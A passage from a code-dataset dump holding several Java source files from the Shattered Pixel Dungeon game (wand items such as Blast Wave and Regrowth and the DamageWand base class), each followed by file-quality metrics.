partialCharge += 1 / (40f - (chargeTarget - charge)*2f);
} else if (cursed && Random.Int(100) == 0){
Buff.prolong( target, Cripple.class, 10f);
}
if (partialCharge >= 1) {
partialCharge --;
charge ++;
}
updateQuickslot();
spend( TICK );
return true;
}
public void gainExp( float levelPortion ) {
if (cursed || levelPortion == 0) return;
exp += Math.round(levelPortion*100);
//past the soft charge cap, gaining charge from leveling is slowed.
if (charge > 5+(level()*2)){
levelPortion *= (5+((float)level()*2))/charge;
}
partialCharge += levelPortion*10f;
if (exp > 100+level()*50 && level() < levelCap){
exp -= 100+level()*50;
GLog.p( Messages.get(this, "levelup") );
upgrade();
}
}
}
}
| 8,341 | EtherealChains | java | en | java | code | {"qsc_code_num_words": 974, "qsc_code_num_chars": 8341.0, "qsc_code_mean_word_length": 5.90451745, "qsc_code_frac_words_unique": 0.2936345, "qsc_code_frac_chars_top_2grams": 0.03286385, "qsc_code_frac_chars_top_3grams": 0.12554338, "qsc_code_frac_chars_top_4grams": 0.13771518, "qsc_code_frac_chars_dupe_5grams": 0.29786124, "qsc_code_frac_chars_dupe_6grams": 0.16605808, "qsc_code_frac_chars_dupe_7grams": 0.07755173, "qsc_code_frac_chars_dupe_8grams": 0.06607547, "qsc_code_frac_chars_dupe_9grams": 0.04973048, "qsc_code_frac_chars_dupe_10grams": 0.03477656, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.0098327, "qsc_code_frac_chars_whitespace": 0.18307157, "qsc_code_size_file_byte": 8341.0, "qsc_code_num_lines": 303.0, "qsc_code_num_chars_line_max": 127.0, "qsc_code_num_chars_line_mean": 27.52805281, "qsc_code_frac_chars_alphabet": 0.83416495, "qsc_code_frac_chars_comments": 0.14650522, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.25225225, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.02078944, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.06306306, "qsc_codejava_score_lines_no_logic": 0.21621622, "qsc_codejava_frac_words_no_modifier": 0.875, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 0.5, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/wands/WandOfBlastWave.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.wands;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.shatteredpixel.shatteredpixeldungeon.Dungeon;
import com.shatteredpixel.shatteredpixeldungeon.actors.Actor;
import com.shatteredpixel.shatteredpixeldungeon.actors.Char;
import com.shatteredpixel.shatteredpixeldungeon.actors.buffs.Paralysis;
import com.shatteredpixel.shatteredpixeldungeon.effects.Effects;
import com.shatteredpixel.shatteredpixeldungeon.effects.MagicMissile;
import com.shatteredpixel.shatteredpixeldungeon.effects.Pushing;
import com.shatteredpixel.shatteredpixeldungeon.items.weapon.enchantments.Elastic;
import com.shatteredpixel.shatteredpixeldungeon.items.weapon.melee.MagesStaff;
import com.shatteredpixel.shatteredpixeldungeon.mechanics.Ballistica;
import com.shatteredpixel.shatteredpixeldungeon.messages.Messages;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
import com.shatteredpixel.shatteredpixeldungeon.tiles.DungeonTilemap;
import com.shatteredpixel.shatteredpixeldungeon.utils.GLog;
import com.watabou.noosa.Game;
import com.watabou.noosa.Group;
import com.watabou.noosa.Image;
import com.watabou.noosa.audio.Sample;
import com.watabou.utils.Callback;
import com.watabou.utils.PathFinder;
import com.watabou.utils.PointF;
import com.watabou.utils.Random;
public class WandOfBlastWave extends DamageWand {
{
image = ItemSpriteSheet.WAND_BLAST_WAVE;
collisionProperties = Ballistica.PROJECTILE;
}
public int min(int lvl){
return 1+lvl;
}
public int max(int lvl){
return 5+3*lvl;
}
@Override
protected void onZap(Ballistica bolt) {
Sample.INSTANCE.play( Assets.SND_BLAST );
BlastWave.blast(bolt.collisionPos);
//presses all tiles in the AOE first
for (int i : PathFinder.NEIGHBOURS9){
Dungeon.level.pressCell( bolt.collisionPos+i );
}
//throws other chars around the center.
for (int i : PathFinder.NEIGHBOURS8){
Char ch = Actor.findChar(bolt.collisionPos + i);
if (ch != null){
processSoulMark(ch, chargesPerCast());
if (ch.alignment != Char.Alignment.ALLY) ch.damage(damageRoll(), this);
if (ch.isAlive()) {
Ballistica trajectory = new Ballistica(ch.pos, ch.pos + i, Ballistica.MAGIC_BOLT);
int strength = 1 + Math.round(level() / 2f);
throwChar(ch, trajectory, strength);
} else if (ch == Dungeon.hero){
Dungeon.fail( getClass() );
GLog.n( Messages.get( this, "ondeath") );
}
}
}
//throws the char at the center of the blast
Char ch = Actor.findChar(bolt.collisionPos);
if (ch != null){
processSoulMark(ch, chargesPerCast());
ch.damage(damageRoll(), this);
if (ch.isAlive() && bolt.path.size() > bolt.dist+1) {
Ballistica trajectory = new Ballistica(ch.pos, bolt.path.get(bolt.dist + 1), Ballistica.MAGIC_BOLT);
int strength = level() + 3;
throwChar(ch, trajectory, strength);
}
}
}
public static void throwChar(final Char ch, final Ballistica trajectory, int power){
int dist = Math.min(trajectory.dist, power);
if (ch.properties().contains(Char.Property.BOSS))
dist /= 2;
if (dist == 0 || ch.properties().contains(Char.Property.IMMOVABLE)) return;
if (Actor.findChar(trajectory.path.get(dist)) != null){
dist--;
}
final int newPos = trajectory.path.get(dist);
if (newPos == ch.pos) return;
final int finalDist = dist;
final int initialpos = ch.pos;
Actor.addDelayed(new Pushing(ch, ch.pos, newPos, new Callback() {
public void call() {
if (initialpos != ch.pos) {
//something caused movement before pushing resolved, cancel to be safe.
ch.sprite.place(ch.pos);
return;
}
ch.pos = newPos;
if (ch.pos == trajectory.collisionPos && ch.isAlive()) {
ch.damage(Random.NormalIntRange((finalDist + 1) / 2, finalDist), this);
Paralysis.prolong(ch, Paralysis.class, Random.NormalIntRange((finalDist + 1) / 2, finalDist));
}
Dungeon.level.occupyCell(ch);
if (ch == Dungeon.hero){
//FIXME currently no logic here if the throw effect kills the hero
Dungeon.observe();
}
}
}), -1);
}
@Override
public void onHit(MagesStaff staff, Char attacker, Char defender, int damage) {
new Elastic().proc(staff, attacker, defender, damage);
}
@Override
protected void fx(Ballistica bolt, Callback callback) {
MagicMissile.boltFromChar( curUser.sprite.parent,
MagicMissile.FORCE,
curUser.sprite,
bolt.collisionPos,
callback);
Sample.INSTANCE.play(Assets.SND_ZAP);
}
@Override
public void staffFx(MagesStaff.StaffParticle particle) {
particle.color( 0x664422 ); particle.am = 0.6f;
particle.setLifespan(3f);
particle.speed.polar(Random.Float(PointF.PI2), 0.3f);
particle.setSize( 1f, 2f);
particle.radiateXY(2.5f);
}
public static class BlastWave extends Image {
private static final float TIME_TO_FADE = 0.2f;
private float time;
public BlastWave(){
super(Effects.get(Effects.Type.RIPPLE));
origin.set(width / 2, height / 2);
}
public void reset(int pos) {
revive();
x = (pos % Dungeon.level.width()) * DungeonTilemap.SIZE + (DungeonTilemap.SIZE - width) / 2;
y = (pos / Dungeon.level.width()) * DungeonTilemap.SIZE + (DungeonTilemap.SIZE - height) / 2;
time = TIME_TO_FADE;
}
@Override
public void update() {
super.update();
if ((time -= Game.elapsed) <= 0) {
kill();
} else {
float p = time / TIME_TO_FADE;
alpha(p);
scale.y = scale.x = (1-p)*3;
}
}
public static void blast(int pos) {
Group parent = Dungeon.hero.sprite.parent;
BlastWave b = (BlastWave) parent.recycle(BlastWave.class);
parent.bringToFront(b);
b.reset(pos);
}
}
}
| 6,467 | WandOfBlastWave | java | en | java | code | {"qsc_code_num_words": 806, "qsc_code_num_chars": 6467.0, "qsc_code_mean_word_length": 5.73325062, "qsc_code_frac_words_unique": 0.34243176, "qsc_code_frac_chars_top_2grams": 0.0447955, "qsc_code_frac_chars_top_3grams": 0.13157325, "qsc_code_frac_chars_top_4grams": 0.14282623, "qsc_code_frac_chars_dupe_5grams": 0.2499459, "qsc_code_frac_chars_dupe_6grams": 0.14022939, "qsc_code_frac_chars_dupe_7grams": 0.0385198, "qsc_code_frac_chars_dupe_8grams": 0.02423718, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01110289, "qsc_code_frac_chars_whitespace": 0.16437297, "qsc_code_size_file_byte": 6467.0, "qsc_code_num_lines": 212.0, "qsc_code_num_chars_line_max": 105.0, "qsc_code_num_chars_line_mean": 30.50471698, "qsc_code_frac_chars_alphabet": 0.84400444, "qsc_code_frac_chars_comments": 0.16035256, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.07284768, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.00128913, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0014733, "qsc_code_frac_lines_prompt_comments": 0.00471698, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.0794702, "qsc_codejava_score_lines_no_logic": 0.25165563, "qsc_codejava_frac_words_no_modifier": 0.84615385, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/wands/WandOfRegrowth.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.wands;
import com.shatteredpixel.shatteredpixeldungeon.Assets;
import com.shatteredpixel.shatteredpixeldungeon.Dungeon;
import com.shatteredpixel.shatteredpixeldungeon.actors.Actor;
import com.shatteredpixel.shatteredpixeldungeon.actors.Char;
import com.shatteredpixel.shatteredpixeldungeon.actors.blobs.Blob;
import com.shatteredpixel.shatteredpixeldungeon.actors.blobs.Regrowth;
import com.shatteredpixel.shatteredpixeldungeon.effects.MagicMissile;
import com.shatteredpixel.shatteredpixeldungeon.items.Dewdrop;
import com.shatteredpixel.shatteredpixeldungeon.items.Generator;
import com.shatteredpixel.shatteredpixeldungeon.items.weapon.enchantments.Blooming;
import com.shatteredpixel.shatteredpixeldungeon.items.weapon.melee.MagesStaff;
import com.shatteredpixel.shatteredpixeldungeon.levels.Level;
import com.shatteredpixel.shatteredpixeldungeon.levels.Terrain;
import com.shatteredpixel.shatteredpixeldungeon.mechanics.Ballistica;
import com.shatteredpixel.shatteredpixeldungeon.plants.Plant;
import com.shatteredpixel.shatteredpixeldungeon.plants.Starflower;
import com.shatteredpixel.shatteredpixeldungeon.scenes.GameScene;
import com.shatteredpixel.shatteredpixeldungeon.sprites.ItemSpriteSheet;
import com.watabou.noosa.audio.Sample;
import com.watabou.utils.Bundle;
import com.watabou.utils.Callback;
import com.watabou.utils.ColorMath;
import com.watabou.utils.PathFinder;
import com.watabou.utils.Random;
import java.util.ArrayList;
import java.util.HashSet;
import java.util.Iterator;
public class WandOfRegrowth extends Wand {
{
image = ItemSpriteSheet.WAND_REGROWTH;
collisionProperties = Ballistica.STOP_TERRAIN;
}
//the actual affected cells
private HashSet<Integer> affectedCells;
//the cells to trace growth particles to, for visual effects.
private HashSet<Integer> visualCells;
private int direction = 0;
private int totChrgUsed = 0;
@Override
protected void onZap( Ballistica bolt ) {
//ignore tiles which can't have anything grow in them.
for (Iterator<Integer> i = affectedCells.iterator(); i.hasNext();) {
int c = Dungeon.level.map[i.next()];
if (!(c == Terrain.EMPTY ||
c == Terrain.EMBERS ||
c == Terrain.EMPTY_DECO ||
c == Terrain.GRASS ||
c == Terrain.HIGH_GRASS ||
c == Terrain.FURROWED_GRASS)) {
i.remove();
}
}
float numPlants, numDews, numPods, numStars;
int overLimit = totChrgUsed - chargeLimit(Dungeon.hero.lvl);
int chrgUsed = chargesPerCast();
//numbers greater than n*100% means n guaranteed plants, e.g. 210% = 2 plants w/10% chance for 3 plants.
numPlants = 0.2f + chrgUsed*chrgUsed*0.020f; //scales from 22% to 220%
numDews = 0.05f + chrgUsed*chrgUsed*0.016f; //scales from 6.6% to 165%
numPods = 0.02f + chrgUsed*chrgUsed*0.013f; //scales from 3.3% to 135%
numStars = (chrgUsed*chrgUsed*chrgUsed/5f)*0.005f; //scales from 0.1% to 100%
if (overLimit > 0){
numPlants -= overLimit*0.02f;
numDews -= overLimit*0.02f;
numPods -= overLimit*0.02f;
numStars -= overLimit*0.02f;
}
placePlants(numPlants, numDews, numPods, numStars);
for (int i : affectedCells){
int c = Dungeon.level.map[i];
if (c == Terrain.EMPTY ||
c == Terrain.EMBERS ||
c == Terrain.EMPTY_DECO) {
Level.set( i, Terrain.GRASS );
}
Char ch = Actor.findChar(i);
if (ch != null){
processSoulMark(ch, chargesPerCast());
}
if (Random.Int(50) < overLimit) {
if (Dungeon.level.map[i] == Terrain.GRASS) {
Level.set( i, Terrain.FURROWED_GRASS );
GameScene.updateMap( i );
}
GameScene.add(Blob.seed(i, 9, Regrowth.class));
} else {
GameScene.add(Blob.seed(i, 10, Regrowth.class));
}
}
totChrgUsed += chrgUsed;
}
private int chargeLimit( int heroLevel ){
if (level() >= 12){
return Integer.MAX_VALUE;
} else {
//4 charges per hero level at +0, with another 2-4 each upgrade from +1 to +9.
//then +7 at +10, +16 at +11, and infinite at +12.
return Math.round(((4 + 2*level())*heroLevel) * (11f/12f + 1f/(12f-level())));
}
}
private void spreadRegrowth(int cell, float strength){
if (strength >= 0 && Dungeon.level.passable[cell]){
affectedCells.add(cell);
if (strength >= 1.5f) {
spreadRegrowth(cell + PathFinder.CIRCLE8[left(direction)], strength - 1.5f);
spreadRegrowth(cell + PathFinder.CIRCLE8[direction], strength - 1.5f);
spreadRegrowth(cell + PathFinder.CIRCLE8[right(direction)], strength-1.5f);
} else {
visualCells.add(cell);
}
} else if (!Dungeon.level.passable[cell])
visualCells.add(cell);
}
private void placePlants(float numPlants, float numDews, float numPods, float numStars){
Iterator<Integer> cells = affectedCells.iterator();
Level floor = Dungeon.level;
while(cells.hasNext() && Random.Float() <= numPlants){
Plant.Seed seed = (Plant.Seed) Generator.random(Generator.Category.SEED);
floor.plant(seed, cells.next());
numPlants --;
}
while (cells.hasNext() && Random.Float() <= numDews){
floor.plant(new Dewcatcher.Seed(), cells.next());
numDews --;
}
while (cells.hasNext() && Random.Float() <= numPods){
floor.plant(new Seedpod.Seed(), cells.next());
numPods --;
}
while (cells.hasNext() && Random.Float() <= numStars){
floor.plant(new Starflower.Seed(), cells.next());
numStars --;
}
}
private int left(int direction){
return direction == 0 ? 7 : direction-1;
}
private int right(int direction){
return direction == 7 ? 0 : direction+1;
}
@Override
public void onHit(MagesStaff staff, Char attacker, Char defender, int damage) {
new Blooming().proc(staff, attacker, defender, damage);
}
protected void fx( Ballistica bolt, Callback callback ) {
affectedCells = new HashSet<>();
visualCells = new HashSet<>();
int maxDist = Math.round(1.2f + chargesPerCast()*.8f);
int dist = Math.min(bolt.dist, maxDist);
for (int i = 0; i < PathFinder.CIRCLE8.length; i++){
if (bolt.sourcePos+PathFinder.CIRCLE8[i] == bolt.path.get(1)){
direction = i;
break;
}
}
float strength = maxDist;
for (int c : bolt.subPath(1, dist)) {
strength--; //as we start at dist 1, not 0.
if (Dungeon.level.passable[c]) {
affectedCells.add(c);
spreadRegrowth(c + PathFinder.CIRCLE8[left(direction)], strength - 1);
spreadRegrowth(c + PathFinder.CIRCLE8[direction], strength - 1);
spreadRegrowth(c + PathFinder.CIRCLE8[right(direction)], strength - 1);
} else {
visualCells.add(c);
}
}
//going to call this one manually
visualCells.remove(bolt.path.get(dist));
for (int cell : visualCells){
//this way we only get the cells at the tip, much better performance.
((MagicMissile)curUser.sprite.parent.recycle( MagicMissile.class )).reset(
MagicMissile.FOLIAGE_CONE,
curUser.sprite,
cell,
null
);
}
MagicMissile.boltFromChar( curUser.sprite.parent,
MagicMissile.FOLIAGE_CONE,
curUser.sprite,
bolt.path.get(dist/2),
callback );
Sample.INSTANCE.play( Assets.SND_ZAP );
}
@Override
protected int initialCharges() {
return 1;
}
@Override
//consumes all available charges, needs at least one.
protected int chargesPerCast() {
return Math.max(1, curCharges);
}
@Override
public void staffFx(MagesStaff.StaffParticle particle) {
particle.color( ColorMath.random(0x004400, 0x88CC44) );
particle.am = 1f;
particle.setLifespan(1f);
particle.setSize( 1f, 1.5f);
particle.shuffleXY(0.5f);
float dst = Random.Float(11f);
particle.x -= dst;
particle.y += dst;
}
private static final String TOTAL = "totChrgUsed";
@Override
public void storeInBundle(Bundle bundle) {
super.storeInBundle(bundle);
bundle.put( TOTAL, totChrgUsed );
}
@Override
public void restoreFromBundle(Bundle bundle) {
super.restoreFromBundle(bundle);
totChrgUsed = bundle.getInt(TOTAL);
}
public static class Dewcatcher extends Plant{
{
image = 13;
}
@Override
public void activate( Char ch ) {
int nDrops = Random.NormalIntRange(3, 6);
ArrayList<Integer> candidates = new ArrayList<>();
for (int i : PathFinder.NEIGHBOURS8){
if (Dungeon.level.passable[pos+i]
&& pos+i != Dungeon.level.entrance
&& pos+i != Dungeon.level.exit){
candidates.add(pos+i);
}
}
for (int i = 0; i < nDrops && !candidates.isEmpty(); i++){
Integer c = Random.element(candidates);
Dungeon.level.drop(new Dewdrop(), c).sprite.drop(pos);
candidates.remove(c);
}
}
//seed is never dropped, only care about plant class
public static class Seed extends Plant.Seed {
{
plantClass = Dewcatcher.class;
}
}
}
public static class Seedpod extends Plant{
{
image = 14;
}
@Override
public void activate( Char ch ) {
int nSeeds = Random.NormalIntRange(2, 4);
ArrayList<Integer> candidates = new ArrayList<>();
for (int i : PathFinder.NEIGHBOURS8){
if (Dungeon.level.passable[pos+i]
&& pos+i != Dungeon.level.entrance
&& pos+i != Dungeon.level.exit){
candidates.add(pos+i);
}
}
for (int i = 0; i < nSeeds && !candidates.isEmpty(); i++){
Integer c = Random.element(candidates);
Dungeon.level.drop(Generator.random(Generator.Category.SEED), c).sprite.drop(pos);
candidates.remove(c);
}
}
//seed is never dropped, only care about plant class
public static class Seed extends Plant.Seed {
{
plantClass = Seedpod.class;
}
}
}
}
| 10,264 | WandOfRegrowth | java | en | java | code | {"qsc_code_num_words": 1262, "qsc_code_num_chars": 10264.0, "qsc_code_mean_word_length": 5.65530903, "qsc_code_frac_words_unique": 0.27733756, "qsc_code_frac_chars_top_2grams": 0.03026482, "qsc_code_frac_chars_top_3grams": 0.10116295, "qsc_code_frac_chars_top_4grams": 0.110971, "qsc_code_frac_chars_dupe_5grams": 0.3217038, "qsc_code_frac_chars_dupe_6grams": 0.209752, "qsc_code_frac_chars_dupe_7grams": 0.15552753, "qsc_code_frac_chars_dupe_8grams": 0.12526272, "qsc_code_frac_chars_dupe_9grams": 0.10985008, "qsc_code_frac_chars_dupe_10grams": 0.10985008, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.02222485, "qsc_code_frac_chars_whitespace": 0.17585737, "qsc_code_size_file_byte": 10264.0, "qsc_code_num_lines": 356.0, "qsc_code_num_chars_line_max": 107.0, "qsc_code_num_chars_line_mean": 28.83146067, "qsc_code_frac_chars_alphabet": 0.8214919, "qsc_code_frac_chars_comments": 0.15081839, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.15648855, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.00126205, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0018357, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 0.0, "qsc_codejava_frac_lines_func_ratio": 0.0610687, "qsc_codejava_score_lines_no_logic": 0.17938931, "qsc_codejava_frac_words_no_modifier": 0.88235294, "qsc_codejava_frac_words_legal_var_name": 1.0, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 1 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, "qsc_code_num_chars": 0, "qsc_code_mean_word_length": 0, "qsc_code_frac_chars_top_2grams": 0, "qsc_code_frac_chars_top_3grams": 0, "qsc_code_frac_chars_top_4grams": 0, "qsc_code_frac_chars_dupe_5grams": 0, "qsc_code_frac_chars_dupe_6grams": 0, "qsc_code_frac_chars_dupe_7grams": 0, "qsc_code_frac_chars_dupe_8grams": 0, "qsc_code_frac_chars_dupe_9grams": 0, "qsc_code_frac_chars_dupe_10grams": 0, "qsc_code_size_file_byte": 0, "qsc_code_num_lines": 0, "qsc_code_num_chars_line_max": 0, "qsc_code_num_chars_line_mean": 0, "qsc_code_frac_chars_alphabet": 0, "qsc_code_frac_chars_digital": 0, "qsc_code_frac_chars_whitespace": 0, "qsc_code_frac_chars_comments": 0, "qsc_code_cate_xml_start": 0, "qsc_code_frac_lines_dupe_lines": 0, "qsc_code_cate_autogen": 0, "qsc_code_frac_lines_long_string": 0, "qsc_code_frac_chars_string_length": 0, "qsc_code_frac_chars_long_word_length": 0, "qsc_code_cate_encoded_data": 0, "qsc_code_frac_chars_hex_words": 0, "qsc_code_frac_lines_prompt_comments": 0, "qsc_code_frac_lines_assert": 0, "qsc_codejava_cate_var_zero": 0, "qsc_codejava_frac_lines_func_ratio": 0, "qsc_codejava_score_lines_no_logic": 0, "qsc_codejava_frac_lines_print": 0} |
00-Evan/shattered-pixel-dungeon-gdx | core/src/com/shatteredpixel/shatteredpixeldungeon/items/wands/DamageWand.java | /*
* Pixel Dungeon
* Copyright (C) 2012-2015 Oleg Dolya
*
* Shattered Pixel Dungeon
* Copyright (C) 2014-2019 Evan Debenham
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>
*/
package com.shatteredpixel.shatteredpixeldungeon.items.wands;
import com.shatteredpixel.shatteredpixeldungeon.messages.Messages;
import com.watabou.utils.Random;
//for wands that directly damage a target
//wands with AOE effects count here (e.g. fireblast), but wands with indrect damage do not (e.g. venom, transfusion)
public abstract class DamageWand extends Wand{
public int min(){
return min(level());
}
public abstract int min(int lvl);
public int max(){
return max(level());
}
public abstract int max(int lvl);
public int damageRoll(){
return Random.NormalIntRange(min(), max());
}
public int damageRoll(int lvl){
return Random.NormalIntRange(min(lvl), max(lvl));
}
@Override
public String statsDesc() {
if (levelKnown)
return Messages.get(this, "stats_desc", min(), max());
else
return Messages.get(this, "stats_desc", min(0), max(0));
}
}
| 1,670 | DamageWand | java | en | java | code | {"qsc_code_num_words": 240, "qsc_code_num_chars": 1670.0, "qsc_code_mean_word_length": 5.0625, "qsc_code_frac_words_unique": 0.52083333, "qsc_code_frac_chars_top_2grams": 0.02962963, "qsc_code_frac_chars_top_3grams": 0.03209877, "qsc_code_frac_chars_top_4grams": 0.04691358, "qsc_code_frac_chars_dupe_5grams": 0.1218107, "qsc_code_frac_chars_dupe_6grams": 0.10041152, "qsc_code_frac_chars_dupe_7grams": 0.05432099, "qsc_code_frac_chars_dupe_8grams": 0.0, "qsc_code_frac_chars_dupe_9grams": 0.0, "qsc_code_frac_chars_dupe_10grams": 0.0, "qsc_code_frac_chars_replacement_symbols": 0.0, "qsc_code_frac_chars_digital": 0.01376812, "qsc_code_frac_chars_whitespace": 0.17365269, "qsc_code_size_file_byte": 1670.0, "qsc_code_num_lines": 57.0, "qsc_code_num_chars_line_max": 117.0, "qsc_code_num_chars_line_mean": 29.29824561, "qsc_code_frac_chars_alphabet": 0.86666667, "qsc_code_frac_chars_comments": 0.56167665, "qsc_code_cate_xml_start": 0.0, "qsc_code_frac_lines_dupe_lines": 0.0, "qsc_code_cate_autogen": 0.0, "qsc_code_frac_lines_long_string": 0.0, "qsc_code_frac_chars_string_length": 0.0273224, "qsc_code_frac_chars_long_word_length": 0.0, "qsc_code_frac_lines_string_concat": 0.0, "qsc_code_cate_encoded_data": 0.0, "qsc_code_frac_chars_hex_words": 0.0, "qsc_code_frac_lines_prompt_comments": 0.0, "qsc_code_frac_lines_assert": 0.0, "qsc_codejava_cate_var_zero": 1.0, "qsc_codejava_frac_lines_func_ratio": 0.26923077, "qsc_codejava_score_lines_no_logic": 0.38461538, "qsc_codejava_frac_words_no_modifier": 0.625, "qsc_codejava_frac_words_legal_var_name": null, "qsc_codejava_frac_words_legal_func_name": 1.0, "qsc_codejava_frac_words_legal_class_name": 1.0, "qsc_codejava_frac_lines_print": 0.0} | 0 | {"qsc_code_frac_chars_replacement_symbols": 0, "qsc_code_num_words": 0, 